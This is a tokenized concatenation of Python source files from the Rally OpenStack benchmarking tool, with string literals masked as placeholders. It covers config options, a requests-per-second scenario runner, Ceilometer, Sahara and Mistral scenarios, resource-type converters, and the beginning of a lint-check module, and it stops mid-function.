<s> import itertools <EOL> from rally . common import logging <EOL> from rally import osclients <EOL> from rally . plugins . openstack . cleanup import base as cleanup_base <EOL> from rally . plugins . openstack . context . keystone import roles <EOL> from rally . plugins . openstack . context . keystone import users <EOL> from rally . plugins . openstack . scenarios . cinder import utils as cinder_utils <EOL> from rally . plugins . openstack . scenarios . ec2 import utils as ec2_utils <EOL> from rally . plugins . openstack . scenarios . heat import utils as heat_utils <EOL> from rally . plugins . openstack . scenarios . ironic import utils as ironic_utils <EOL> from rally . plugins . openstack . scenarios . manila import utils as manila_utils <EOL> from rally . plugins . openstack . scenarios . murano import utils as murano_utils <EOL> from rally . plugins . openstack . scenarios . nova import utils as nova_utils <EOL> from rally . plugins . openstack . scenarios . sahara import utils as sahara_utils <EOL> from rally . plugins . openstack . scenarios . vm import utils as vm_utils <EOL> from rally . plugins . openstack . wrappers import glance as glance_utils <EOL> from rally . verification . tempest import config as tempest_conf <EOL> def list_opts ( ) : <EOL> return [ <EOL> ( "<STR_LIT>" , <EOL> itertools . chain ( logging . DEBUG_OPTS , <EOL> osclients . OSCLIENTS_OPTS ) ) , <EOL> ( "<STR_LIT>" , <EOL> itertools . chain ( cinder_utils . CINDER_BENCHMARK_OPTS , <EOL> ec2_utils . EC2_BENCHMARK_OPTS , <EOL> glance_utils . GLANCE_BENCHMARK_OPTS , <EOL> heat_utils . HEAT_BENCHMARK_OPTS , <EOL> ironic_utils . IRONIC_BENCHMARK_OPTS , <EOL> manila_utils . MANILA_BENCHMARK_OPTS , <EOL> murano_utils . MURANO_BENCHMARK_OPTS , <EOL> nova_utils . NOVA_BENCHMARK_OPTS , <EOL> sahara_utils . SAHARA_BENCHMARK_OPTS , <EOL> vm_utils . VM_BENCHMARK_OPTS ) ) , <EOL> ( "<STR_LIT:image>" , <EOL> itertools . chain ( tempest_conf . IMAGE_OPTS ) ) , <EOL> ( "<STR_LIT>" , itertools . chain ( tempest_conf . ROLE_OPTS ) ) , <EOL> ( "<STR_LIT>" , itertools . chain ( roles . ROLES_CONTEXT_OPTS ) ) , <EOL> ( "<STR_LIT>" , itertools . chain ( users . USER_CONTEXT_OPTS ) ) , <EOL> ( "<STR_LIT>" , itertools . chain ( cleanup_base . CLEANUP_OPTS ) ) <EOL> ] </s>
<s> import collections <EOL> import multiprocessing <EOL> import threading <EOL> import time <EOL> from six . moves import queue as Queue <EOL> from rally . common import logging <EOL> from rally . common import utils <EOL> from rally import consts <EOL> from rally . task import runner <EOL> LOG = logging . getLogger ( __name__ ) <EOL> def _worker_process ( queue , iteration_gen , timeout , rps , times , <EOL> max_concurrent , context , cls , method_name , <EOL> args , aborted , info ) : <EOL> """<STR_LIT>""" <EOL> pool = collections . deque ( ) <EOL> sleep = <NUM_LIT:1.0> / rps <EOL> runner . _log_worker_info ( times = times , rps = rps , timeout = timeout , <EOL> cls = cls , method_name = method_name , args = args ) <EOL> time . sleep ( <EOL> ( sleep * info [ "<STR_LIT>" ] ) / info [ "<STR_LIT>" ] ) <EOL> start = time . time ( ) <EOL> timeout_queue = Queue . Queue ( ) <EOL> if timeout : <EOL> collector_thr_by_timeout = threading . Thread ( <EOL> target = utils . timeout_thread , <EOL> args = ( timeout_queue , ) <EOL> ) <EOL> collector_thr_by_timeout . start ( ) <EOL> i = <NUM_LIT:0> <EOL> while i < times and not aborted . is_set ( ) : <EOL> scenario_context = runner . _get_scenario_context ( next ( iteration_gen ) , <EOL> context ) <EOL> worker_args = ( queue , cls , method_name , scenario_context , args ) <EOL> thread = threading . Thread ( target = runner . _worker_thread , <EOL> args = worker_args ) <EOL> i += <NUM_LIT:1> <EOL> thread . start ( ) <EOL> if timeout : <EOL> timeout_queue . put ( ( thread . ident , time . time ( ) + timeout ) ) <EOL> pool . append ( thread ) <EOL> time_gap = time . time ( ) - start <EOL> real_rps = i / time_gap if time_gap else "<STR_LIT>" <EOL> LOG . debug ( "<STR_LIT>" % <EOL> ( i , real_rps , rps ) ) <EOL> while i / ( time . time ( ) - start ) > rps or len ( pool ) >= max_concurrent : <EOL> if pool : <EOL> pool [ <NUM_LIT:0> ] . join ( <NUM_LIT> ) <EOL> if not pool [ <NUM_LIT:0> ] . isAlive ( ) : <EOL> pool . popleft ( ) <EOL> else : <EOL> time . sleep ( <NUM_LIT> ) <EOL> while pool : <EOL> thr = pool . popleft ( ) <EOL> thr . join ( ) <EOL> if timeout : <EOL> timeout_queue . put ( ( None , None , ) ) <EOL> collector_thr_by_timeout . join ( ) <EOL> @ runner . configure ( name = "<STR_LIT>" ) <EOL> class RPSScenarioRunner ( runner . ScenarioRunner ) : <EOL> """<STR_LIT>""" <EOL> CONFIG_SCHEMA = { <EOL> "<STR_LIT:type>" : "<STR_LIT:object>" , <EOL> "<STR_LIT>" : consts . JSON_SCHEMA , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:type>" : { <EOL> "<STR_LIT:type>" : "<STR_LIT:string>" <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT:1> <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : <NUM_LIT:0> <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT:1> <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT:1> <EOL> } <EOL> } , <EOL> "<STR_LIT>" : False <EOL> } <EOL> def _run_scenario ( self , cls , method_name , context , args ) : <EOL> """<STR_LIT>""" <EOL> times = self . config [ "<STR_LIT>" ] <EOL> timeout = self . config . get ( "<STR_LIT>" , <NUM_LIT:0> ) <EOL> iteration_gen = utils . RAMInt ( ) <EOL> cpu_count = multiprocessing . cpu_count ( ) <EOL> max_cpu_used = min ( cpu_count , <EOL> self . config . get ( "<STR_LIT>" , cpu_count ) ) <EOL> processes_to_start = min ( max_cpu_used , times , <EOL> self . config . get ( "<STR_LIT>" , times ) ) <EOL> rps_per_worker = float ( self . config [ "<STR_LIT>" ] ) / processes_to_start <EOL> times_per_worker , times_overhead = divmod ( times , processes_to_start ) <EOL> concurrency_per_worker , concurrency_overhead = divmod ( <EOL> self . config . get ( "<STR_LIT>" , times ) , processes_to_start ) <EOL> self . _log_debug_info ( times = times , timeout = timeout , <EOL> max_cpu_used = max_cpu_used , <EOL> processes_to_start = processes_to_start , <EOL> rps_per_worker = rps_per_worker , <EOL> times_per_worker = times_per_worker , <EOL> times_overhead = times_overhead , <EOL> concurrency_per_worker = concurrency_per_worker , <EOL> concurrency_overhead = concurrency_overhead ) <EOL> result_queue = multiprocessing . Queue ( ) <EOL> def worker_args_gen ( times_overhead , concurrency_overhead ) : <EOL> """<STR_LIT>""" <EOL> while True : <EOL> yield ( result_queue , iteration_gen , timeout , rps_per_worker , <EOL> times_per_worker + ( times_overhead and <NUM_LIT:1> ) , <EOL> concurrency_per_worker + ( concurrency_overhead and <NUM_LIT:1> ) , <EOL> context , cls , method_name , args , self . aborted ) <EOL> if times_overhead : <EOL> times_overhead -= <NUM_LIT:1> <EOL> if concurrency_overhead : <EOL> concurrency_overhead -= <NUM_LIT:1> <EOL> process_pool = self . _create_process_pool ( <EOL> processes_to_start , _worker_process , <EOL> worker_args_gen ( times_overhead , concurrency_overhead ) ) <EOL> self . _join_processes ( process_pool , result_queue ) </s>
<s> SHARE_NETWORKS_CONTEXT_NAME = "<STR_LIT>" </s>
<s> from rally import consts <EOL> from rally . plugins . openstack import scenario <EOL> from rally . plugins . openstack . scenarios . ceilometer import utils as ceiloutils <EOL> from rally . task import validation <EOL> class CeilometerAlarms ( ceiloutils . CeilometerScenario ) : <EOL> """<STR_LIT>""" <EOL> @ validation . required_services ( consts . Service . CEILOMETER ) <EOL> @ validation . required_openstack ( users = True ) <EOL> @ scenario . configure ( context = { "<STR_LIT>" : [ "<STR_LIT>" ] } ) <EOL> def create_alarm ( self , meter_name , threshold , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . _create_alarm ( meter_name , threshold , kwargs ) <EOL> @ validation . required_services ( consts . Service . CEILOMETER ) <EOL> @ validation . required_openstack ( users = True ) <EOL> @ scenario . configure ( ) <EOL> def list_alarms ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _list_alarms ( ) <EOL> @ validation . required_services ( consts . Service . CEILOMETER ) <EOL> @ validation . required_openstack ( users = True ) <EOL> @ scenario . configure ( context = { "<STR_LIT>" : [ "<STR_LIT>" ] } ) <EOL> def create_and_list_alarm ( self , meter_name , threshold , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> alarm = self . _create_alarm ( meter_name , threshold , kwargs ) <EOL> self . _list_alarms ( alarm . alarm_id ) <EOL> @ validation . required_services ( consts . Service . CEILOMETER ) <EOL> @ validation . required_openstack ( users = True ) <EOL> @ scenario . configure ( context = { "<STR_LIT>" : [ "<STR_LIT>" ] } ) <EOL> def create_and_update_alarm ( self , meter_name , threshold , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> alarm = self . _create_alarm ( meter_name , threshold , kwargs ) <EOL> alarm_dict_diff = { "<STR_LIT:description>" : "<STR_LIT>" } <EOL> self . _update_alarm ( alarm . alarm_id , alarm_dict_diff ) <EOL> @ validation . required_services ( consts . Service . CEILOMETER ) <EOL> @ validation . required_openstack ( users = True ) <EOL> @ scenario . configure ( context = { "<STR_LIT>" : [ "<STR_LIT>" ] } ) <EOL> def create_and_delete_alarm ( self , meter_name , threshold , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> alarm = self . _create_alarm ( meter_name , threshold , kwargs ) <EOL> self . _delete_alarm ( alarm . alarm_id ) <EOL> @ validation . required_services ( consts . Service . CEILOMETER ) <EOL> @ validation . required_openstack ( users = True ) <EOL> @ scenario . configure ( context = { "<STR_LIT>" : [ "<STR_LIT>" ] } ) <EOL> def create_alarm_and_get_history ( self , meter_name , threshold , state , <EOL> timeout = <NUM_LIT> , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> alarm = self . _create_alarm ( meter_name , threshold , kwargs ) <EOL> self . _get_alarm_state ( alarm . alarm_id ) <EOL> self . _get_alarm_history ( alarm . alarm_id ) <EOL> self . _set_alarm_state ( alarm , state , timeout ) </s>
<s> import yaml <EOL> from rally . plugins . openstack import scenario <EOL> from rally . task import atomic <EOL> class MistralScenario ( scenario . OpenStackScenario ) : <EOL> """<STR_LIT>""" <EOL> @ atomic . action_timer ( "<STR_LIT>" ) <EOL> def _list_workbooks ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . clients ( "<STR_LIT>" ) . workbooks . list ( ) <EOL> @ atomic . action_timer ( "<STR_LIT>" ) <EOL> def _create_workbook ( self , definition ) : <EOL> """<STR_LIT>""" <EOL> definition = yaml . safe_load ( definition ) <EOL> definition [ "<STR_LIT:name>" ] = self . generate_random_name ( ) <EOL> definition = yaml . safe_dump ( definition ) <EOL> return self . clients ( "<STR_LIT>" ) . workbooks . create ( definition ) <EOL> @ atomic . action_timer ( "<STR_LIT>" ) <EOL> def _delete_workbook ( self , wb_name ) : <EOL> """<STR_LIT>""" <EOL> self . clients ( "<STR_LIT>" ) . workbooks . delete ( wb_name ) </s>
<s> from rally import consts <EOL> from rally . plugins . openstack import scenario <EOL> from rally . plugins . openstack . scenarios . sahara import utils <EOL> from rally . task import types <EOL> from rally . task import validation <EOL> class SaharaNodeGroupTemplates ( utils . SaharaScenario ) : <EOL> """<STR_LIT>""" <EOL> @ types . convert ( flavor = { "<STR_LIT:type>" : "<STR_LIT>" } ) <EOL> @ validation . flavor_exists ( "<STR_LIT>" ) <EOL> @ validation . required_services ( consts . Service . SAHARA ) <EOL> @ validation . required_openstack ( users = True ) <EOL> @ scenario . configure ( context = { "<STR_LIT>" : [ "<STR_LIT>" ] } ) <EOL> def create_and_list_node_group_templates ( self , flavor , <EOL> plugin_name = "<STR_LIT>" , <EOL> hadoop_version = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> self . _create_master_node_group_template ( flavor_id = flavor , <EOL> plugin_name = plugin_name , <EOL> hadoop_version = hadoop_version ) <EOL> self . _create_worker_node_group_template ( flavor_id = flavor , <EOL> plugin_name = plugin_name , <EOL> hadoop_version = hadoop_version ) <EOL> self . _list_node_group_templates ( ) <EOL> @ types . convert ( flavor = { "<STR_LIT:type>" : "<STR_LIT>" } ) <EOL> @ validation . flavor_exists ( "<STR_LIT>" ) <EOL> @ validation . required_services ( consts . Service . SAHARA ) <EOL> @ validation . required_openstack ( users = True ) <EOL> @ scenario . configure ( context = { "<STR_LIT>" : [ "<STR_LIT>" ] } ) <EOL> def create_delete_node_group_templates ( self , flavor , <EOL> plugin_name = "<STR_LIT>" , <EOL> hadoop_version = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> master_ngt = self . _create_master_node_group_template ( <EOL> flavor_id = flavor , <EOL> plugin_name = plugin_name , <EOL> hadoop_version = hadoop_version ) <EOL> worker_ngt = self . _create_worker_node_group_template ( <EOL> flavor_id = flavor , <EOL> plugin_name = plugin_name , <EOL> hadoop_version = hadoop_version ) <EOL> self . _delete_node_group_template ( master_ngt ) <EOL> self . _delete_node_group_template ( worker_ngt ) </s>
<s> import abc <EOL> import copy <EOL> import operator <EOL> import os . path <EOL> import re <EOL> import requests <EOL> from rally . common . i18n import _ <EOL> from rally . common import logging <EOL> from rally . common . plugin import plugin <EOL> from rally import exceptions <EOL> from rally import osclients <EOL> from rally . task import scenario <EOL> LOG = logging . getLogger ( __name__ ) <EOL> @ logging . log_deprecated ( "<STR_LIT>" , "<STR_LIT>" , once = True ) <EOL> def set ( ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> def wrapper ( func ) : <EOL> func . _meta_setdefault ( "<STR_LIT>" , { } ) <EOL> func . _meta_get ( "<STR_LIT>" ) . update ( kwargs ) <EOL> return func <EOL> return wrapper <EOL> def _get_preprocessor_loader ( plugin_name ) : <EOL> """<STR_LIT>""" <EOL> def transform ( cls , * args , ** kwargs ) : <EOL> plug = ResourceType . get ( plugin_name ) <EOL> return plug . transform ( * args , ** kwargs ) <EOL> return type ( "<STR_LIT>" % plugin_name , <EOL> ( object , ) , <EOL> { "<STR_LIT>" : classmethod ( transform ) } ) <EOL> def convert ( ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> preprocessors = dict ( [ ( k , _get_preprocessor_loader ( v [ "<STR_LIT:type>" ] ) ) <EOL> for k , v in kwargs . items ( ) ] ) <EOL> def wrapper ( func ) : <EOL> func . _meta_setdefault ( "<STR_LIT>" , { } ) <EOL> func . _meta_get ( "<STR_LIT>" ) . update ( preprocessors ) <EOL> return func <EOL> return wrapper <EOL> def preprocess ( name , context , args ) : <EOL> """<STR_LIT>""" <EOL> preprocessors = scenario . Scenario . get ( name ) . _meta_get ( "<STR_LIT>" , <EOL> default = { } ) <EOL> clients = osclients . Clients ( context [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) <EOL> processed_args = copy . deepcopy ( args ) <EOL> for src , preprocessor in preprocessors . items ( ) : <EOL> resource_cfg = processed_args . get ( src ) <EOL> if resource_cfg : <EOL> processed_args [ src ] = preprocessor . transform ( <EOL> clients = clients , resource_config = resource_cfg ) <EOL> return processed_args <EOL> class ResourceType ( plugin . Plugin ) : <EOL> @ classmethod <EOL> @ abc . abstractmethod <EOL> def transform ( cls , clients , resource_config ) : <EOL> """<STR_LIT>""" <EOL> class DeprecatedResourceType ( object ) : <EOL> @ classmethod <EOL> @ abc . abstractmethod <EOL> def transform ( cls , clients , resource_config ) : <EOL> """<STR_LIT>""" <EOL> def obj_from_name ( resource_config , resources , typename ) : <EOL> """<STR_LIT>""" <EOL> if "<STR_LIT:name>" in resource_config : <EOL> matching_exact = [ resource for resource in resources <EOL> if resource . name == resource_config [ "<STR_LIT:name>" ] ] <EOL> if len ( matching_exact ) == <NUM_LIT:1> : <EOL> return matching_exact [ <NUM_LIT:0> ] <EOL> elif len ( matching_exact ) > <NUM_LIT:1> : <EOL> raise exceptions . InvalidScenarioArgument ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( typename = typename . title ( ) , <EOL> pattern = resource_config [ "<STR_LIT:name>" ] , <EOL> ids = "<STR_LIT:U+002CU+0020>" . join ( map ( <EOL> operator . attrgetter ( "<STR_LIT:id>" ) , <EOL> matching_exact ) ) ) ) <EOL> patternstr = resource_config [ "<STR_LIT:name>" ] <EOL> elif "<STR_LIT>" in resource_config : <EOL> patternstr = resource_config [ "<STR_LIT>" ] <EOL> else : <EOL> raise exceptions . InvalidScenarioArgument ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( typename = typename . title ( ) , <EOL> resource_config = resource_config ) ) <EOL> pattern = re . compile ( patternstr ) <EOL> matching = [ resource for resource in resources <EOL> if re . search ( pattern , resource . name ) ] <EOL> if not matching : <EOL> raise exceptions . InvalidScenarioArgument ( <EOL> "<STR_LIT>" . format ( <EOL> typename = typename . title ( ) , pattern = pattern . pattern ) ) <EOL> elif len ( matching ) > <NUM_LIT:1> : <EOL> raise exceptions . InvalidScenarioArgument ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( typename = typename . title ( ) , <EOL> pattern = pattern . pattern , <EOL> ids = "<STR_LIT:U+002CU+0020>" . join ( map ( operator . attrgetter ( "<STR_LIT:id>" ) , <EOL> matching ) ) ) ) <EOL> return matching [ <NUM_LIT:0> ] <EOL> def obj_from_id ( resource_config , resources , typename ) : <EOL> """<STR_LIT>""" <EOL> if "<STR_LIT:id>" in resource_config : <EOL> matching = [ resource for resource in resources <EOL> if resource . id == resource_config [ "<STR_LIT:id>" ] ] <EOL> if len ( matching ) == <NUM_LIT:1> : <EOL> return matching [ <NUM_LIT:0> ] <EOL> elif len ( matching ) > <NUM_LIT:1> : <EOL> raise exceptions . MultipleMatchesFound ( <EOL> needle = "<STR_LIT>" . format ( <EOL> typename = typename . title ( ) , id = resource_config [ "<STR_LIT:id>" ] ) , <EOL> haystack = matching ) <EOL> else : <EOL> raise exceptions . InvalidScenarioArgument ( <EOL> "<STR_LIT>" . format ( <EOL> typename = typename . title ( ) , id = resource_config [ "<STR_LIT:id>" ] ) ) <EOL> else : <EOL> raise exceptions . InvalidScenarioArgument ( <EOL> "<STR_LIT>" . format ( <EOL> typename = typename . title ( ) , resource_config = resource_config ) ) <EOL> def _id_from_name ( resource_config , resources , typename ) : <EOL> """<STR_LIT>""" <EOL> return obj_from_name ( resource_config , resources , typename ) . id <EOL> def _name_from_id ( resource_config , resources , typename ) : <EOL> """<STR_LIT>""" <EOL> return obj_from_id ( resource_config , resources , typename ) . name <EOL> def log_deprecated_resource_type ( func ) : <EOL> """<STR_LIT>""" <EOL> def inner ( cls , clients , resource_config ) : <EOL> LOG . warning ( _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % <EOL> cls . __name__ ) <EOL> return func ( cls , clients , resource_config ) <EOL> return inner <EOL> class FlavorResourceType ( DeprecatedResourceType ) : <EOL> @ classmethod <EOL> @ log_deprecated_resource_type <EOL> def transform ( cls , clients , resource_config ) : <EOL> """<STR_LIT>""" <EOL> resource_id = resource_config . get ( "<STR_LIT:id>" ) <EOL> if not resource_id : <EOL> novaclient = clients . nova ( ) <EOL> resource_id = _id_from_name ( resource_config = resource_config , <EOL> resources = novaclient . flavors . list ( ) , <EOL> typename = "<STR_LIT>" ) <EOL> return resource_id <EOL> class EC2FlavorResourceType ( DeprecatedResourceType ) : <EOL> @ classmethod <EOL> @ log_deprecated_resource_type <EOL> def transform ( cls , clients , resource_config ) : <EOL> """<STR_LIT>""" <EOL> resource_name = resource_config . get ( "<STR_LIT:name>" ) <EOL> if not resource_name : <EOL> novaclient = clients . nova ( ) <EOL> resource_name = _name_from_id ( resource_config = resource_config , <EOL> resources = novaclient . flavors . list ( ) , <EOL> typename = "<STR_LIT>" ) <EOL> return resource_name <EOL> class ImageResourceType ( DeprecatedResourceType ) : <EOL> @ classmethod <EOL> @ log_deprecated_resource_type <EOL> def transform ( cls , clients , resource_config ) : <EOL> """<STR_LIT>""" <EOL> resource_id = resource_config . get ( "<STR_LIT:id>" ) <EOL> if not resource_id : <EOL> glanceclient = clients . glance ( ) <EOL> resource_id = _id_from_name ( resource_config = resource_config , <EOL> resources = list ( <EOL> glanceclient . images . list ( ) ) , <EOL> typename = "<STR_LIT:image>" ) <EOL> return resource_id <EOL> class EC2ImageResourceType ( DeprecatedResourceType ) : <EOL> @ classmethod <EOL> @ log_deprecated_resource_type <EOL> def transform ( cls , clients , resource_config ) : <EOL> """<STR_LIT>""" <EOL> if "<STR_LIT:name>" not in resource_config and "<STR_LIT>" not in resource_config : <EOL> glanceclient = clients . glance ( ) <EOL> resource_name = _name_from_id ( resource_config = resource_config , <EOL> resources = list ( <EOL> glanceclient . images . list ( ) ) , <EOL> typename = "<STR_LIT:image>" ) <EOL> resource_config [ "<STR_LIT:name>" ] = resource_name <EOL> ec2client = clients . ec2 ( ) <EOL> resource_ec2_id = _id_from_name ( resource_config = resource_config , <EOL> resources = list ( <EOL> ec2client . get_all_images ( ) ) , <EOL> typename = "<STR_LIT>" ) <EOL> return resource_ec2_id <EOL> class VolumeTypeResourceType ( DeprecatedResourceType ) : <EOL> @ classmethod <EOL> @ log_deprecated_resource_type <EOL> def transform ( cls , clients , resource_config ) : <EOL> """<STR_LIT>""" <EOL> resource_id = resource_config . get ( "<STR_LIT:id>" ) <EOL> if not resource_id : <EOL> cinderclient = clients . cinder ( ) <EOL> resource_id = _id_from_name ( resource_config = resource_config , <EOL> resources = cinderclient . <EOL> volume_types . list ( ) , <EOL> typename = "<STR_LIT>" ) <EOL> return resource_id <EOL> class NeutronNetworkResourceType ( DeprecatedResourceType ) : <EOL> @ classmethod <EOL> @ log_deprecated_resource_type <EOL> def transform ( cls , clients , resource_config ) : <EOL> """<STR_LIT>""" <EOL> resource_id = resource_config . get ( "<STR_LIT:id>" ) <EOL> if resource_id : <EOL> return resource_id <EOL> else : <EOL> neutronclient = clients . neutron ( ) <EOL> for net in neutronclient . list_networks ( ) [ "<STR_LIT>" ] : <EOL> if net [ "<STR_LIT:name>" ] == resource_config . get ( "<STR_LIT:name>" ) : <EOL> return net [ "<STR_LIT:id>" ] <EOL> raise exceptions . InvalidScenarioArgument ( <EOL> "<STR_LIT>" . format ( <EOL> name = resource_config . get ( "<STR_LIT:name>" ) ) ) <EOL> class FilePathOrUrlType ( DeprecatedResourceType ) : <EOL> @ classmethod <EOL> @ log_deprecated_resource_type <EOL> def transform ( cls , clients , resource_config ) : <EOL> """<STR_LIT>""" <EOL> path = os . path . expanduser ( resource_config ) <EOL> if os . path . isfile ( path ) : <EOL> return path <EOL> try : <EOL> head = requests . head ( path ) <EOL> if head . status_code == <NUM_LIT:200> : <EOL> return path <EOL> raise exceptions . InvalidScenarioArgument ( <EOL> "<STR_LIT>" % ( path , head . status_code ) ) <EOL> except Exception as ex : <EOL> raise exceptions . InvalidScenarioArgument ( <EOL> "<STR_LIT>" % ( path , ex ) ) <EOL> class FileType ( DeprecatedResourceType ) : <EOL> @ classmethod <EOL> @ log_deprecated_resource_type <EOL> def transform ( cls , clients , resource_config ) : <EOL> """<STR_LIT>""" <EOL> with open ( os . path . expanduser ( resource_config ) , "<STR_LIT:r>" ) as f : <EOL> return f . read ( ) <EOL> class FileTypeDict ( DeprecatedResourceType ) : <EOL> @ classmethod <EOL> @ log_deprecated_resource_type <EOL> def transform ( cls , clients , resource_config ) : <EOL> """<STR_LIT>""" <EOL> file_type_dict = { } <EOL> for file_path in resource_config : <EOL> file_path = os . path . expanduser ( file_path ) <EOL> with open ( file_path , "<STR_LIT:r>" ) as f : <EOL> file_type_dict [ file_path ] = f . read ( ) <EOL> return file_type_dict </s>
<s> """<STR_LIT>""" <EOL> import functools <EOL> import re <EOL> import tokenize <EOL> re_assert_true_instance = re . compile ( <EOL> r"<STR_LIT>" <EOL> r"<STR_LIT>" ) <EOL> re_assert_equal_type = re . compile ( <EOL> r"<STR_LIT>" <EOL> r"<STR_LIT>" ) <EOL> re_assert_equal_end_with_none = re . compile ( r"<STR_LIT>" ) <EOL> re_assert_equal_start_with_none = re . compile ( r"<STR_LIT>" ) <EOL> re_assert_true_false_with_in_or_not_in = re . compile ( <EOL> r"<STR_LIT>" <EOL> r"<STR_LIT>" ) <EOL> re_assert_true_false_with_in_or_not_in_spaces = re . compile ( <EOL> r"<STR_LIT>" <EOL> r"<STR_LIT>" ) <EOL> re_assert_equal_in_end_with_true_or_false = re . compile ( <EOL> r"<STR_LIT>" ) <EOL> re_assert_equal_in_start_with_true_or_false = re . compile ( <EOL> r"<STR_LIT>" ) <EOL> re_no_construct_dict = re . compile ( <EOL> r"<STR_LIT>" ) <EOL> re_no_construct_list = re . compile ( <EOL> r"<STR_LIT>" ) <EOL> re_str_format = re . compile ( r"""<STR_LIT>""" , re . X ) <EOL> re_raises = re . compile ( <EOL> r"<STR_LIT>" ) <EOL> re_db_import = re . compile ( r"<STR_LIT>" ) <EOL> re_objects_import = re . compile ( r"<STR_LIT>" ) <EOL> re_old_type_class = re . compile ( r"<STR_LIT>" ) <EOL> re_datetime_alias = re . compile ( r"<STR_LIT>" ) <EOL> def skip_ignored_lines ( func ) : <EOL> @ functools . wraps ( func ) <EOL> def wrapper ( logical_line , physical_line , filename ) : <EOL> line = physical_line . strip ( ) <EOL> if not line or line . startswith ( "<STR_LIT:#>" ) or line . endswith ( "<STR_LIT>" ) : <EOL> return <EOL> yield next ( func ( logical_line , physical_line , filename ) ) <EOL> return wrapper <EOL> def _parse_assert_mock_str ( line ) : <EOL> point = line . find ( "<STR_LIT>" ) <EOL> if point == - <NUM_LIT:1> : <EOL> point = line . find ( "<STR_LIT>" ) <EOL> if point != - <NUM_LIT:1> : <EOL> end_pos = line [ point : ] . find ( "<STR_LIT:(>" ) + point <EOL> return point , line [ point + <NUM_LIT:1> : end_pos ] , line [ : point ] <EOL> else : <EOL> return None , None , None <EOL> @ skip_ignored_lines <EOL> def check_assert_methods_from_mock ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> correct_names = [ "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> ignored_files = [ "<STR_LIT>" ] <EOL> if filename . startswith ( "<STR_LIT>" ) and filename not in ignored_files : <EOL> pos , method_name , obj_name = _parse_assert_mock_str ( logical_line ) <EOL> if pos : <EOL> if method_name not in correct_names : <EOL> error_number = "<STR_LIT>" <EOL> msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if method_name == "<STR_LIT>" : <EOL> error_number = "<STR_LIT>" <EOL> custom_msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> obj_name ) <EOL> elif method_name == "<STR_LIT>" : <EOL> error_number = "<STR_LIT>" <EOL> custom_msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( obj_name , obj_name ) ) <EOL> elif method_name == "<STR_LIT>" : <EOL> error_number = "<STR_LIT>" <EOL> custom_msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % obj_name ) <EOL> else : <EOL> custom_msg = ( "<STR_LIT>" <EOL> % "<STR_LIT>" . join ( correct_names ) ) <EOL> yield ( pos , msg % { <EOL> "<STR_LIT>" : error_number , <EOL> "<STR_LIT>" : method_name , <EOL> "<STR_LIT>" : custom_msg } ) <EOL> @ skip_ignored_lines <EOL> def check_import_of_logging ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> excluded_files = [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> forbidden_imports = [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> if filename not in excluded_files : <EOL> for forbidden_import in forbidden_imports : <EOL> if logical_line . startswith ( forbidden_import ) : <EOL> yield ( <NUM_LIT:0> , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ skip_ignored_lines <EOL> def no_translate_debug_logs ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> if logical_line . startswith ( "<STR_LIT>" ) : <EOL> yield ( <NUM_LIT:0> , "<STR_LIT>" ) <EOL> @ skip_ignored_lines <EOL> def no_use_conf_debug_check ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> excluded_files = [ "<STR_LIT>" ] <EOL> point = logical_line . find ( "<STR_LIT>" ) <EOL> if point != - <NUM_LIT:1> and filename not in excluded_files : <EOL> yield ( point , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ skip_ignored_lines <EOL> def assert_true_instance ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> if re_assert_true_instance . match ( logical_line ) : <EOL> yield ( <NUM_LIT:0> , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ skip_ignored_lines <EOL> def assert_equal_type ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> if re_assert_equal_type . match ( logical_line ) : <EOL> yield ( <NUM_LIT:0> , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ skip_ignored_lines <EOL> def assert_equal_none ( logical_line , physical_line , filename 